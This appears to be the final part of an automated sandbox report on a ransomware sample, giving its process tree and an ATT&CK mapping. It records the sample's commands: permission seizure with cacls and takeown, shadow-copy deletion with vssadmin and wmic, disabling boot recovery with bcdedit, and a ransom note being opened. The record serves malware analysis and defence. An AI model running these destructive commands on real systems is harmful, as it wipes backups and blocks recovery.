                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "00000093.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        lrEU2Z2i.exe -accepteula "00000093.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6064
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000006S.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula "0000006S.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "00000076.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              lrEU2Z2i.exe -accepteula "00000076.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000007G.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        lrEU2Z2i.exe -accepteula "0000007G.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8152
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000007Q.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula "0000007Q.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4812
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\dHHgJtEL.bat"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  vssadmin Delete Shadows /All /Quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  wmic SHADOWCOPY DELETE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bcdedit /set {default} recoveryenabled No
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SCHTASKS /Delete /TN DSHCA /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1376
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\#README_EMAN#.rtf" /o ""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7364

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Reconnaissance

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Resource Development

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Initial Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Windows Management Instrumentation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1047

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1547

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1547.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1547

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1547.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Direct Volume Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1006

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                File and Directory Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1222

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Indicator Removal

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1070

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                File Deletion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1070.004

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Credentials from Password Stores

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1555

